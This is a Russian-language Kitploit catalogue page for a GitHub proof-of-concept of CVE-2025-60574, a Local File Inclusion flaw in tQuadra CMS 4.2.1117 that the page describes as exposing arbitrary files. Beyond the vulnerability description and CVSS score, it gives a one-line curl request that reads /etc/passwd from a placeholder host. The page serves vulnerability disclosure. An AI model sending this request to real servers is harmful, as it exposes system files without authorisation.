Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-60574 — Эксплойт доказательства концепции для CVE-2025-60574 — уязвимости Local File Inclusion в tQuadra CMS 4.2.1117, позволяющей извлекать произвольные файлы с помощью специально сформированных GET-запросов. | Kitploit
Инструменты/GitHubGitHub/jacopoaugelli/cve-2025-60574
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubjacopoaugelli/cve-2025-60574

CVE-2025-60574

Эксплойт доказательства концепции для CVE-2025-60574 — уязвимости Local File Inclusion в tQuadra CMS 4.2.1117, позволяющей извлекать произвольные файлы с помощью специально сформированных GET-запросов.

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обнаружители уязвимостей и авторы эксплойтов

Стефано Андреатта и Джакопо Кандидо Аугелли


CVE-2025-60574

Описание уязвимости

В tQuadra CMS 4.2.1117 обнаружена уязвимость типа Local File Inclusion (LFI). Проблема существует в пути "/styles/", который не обеспечивает надлежащую очистку вводимых пользователем данных. Злоумышленник может воспользоваться этим, отправив специально сформированный GET-запрос для получения произвольных файлов из базовой системы.

Обнаружители: Стефано Андреатта и Джакопо Кандидо Аугелли

CVSS 3.1 - 7.5 High

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Подтверждение концепции

root@kitploit:~
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip

PoC.png

Скачать инструмент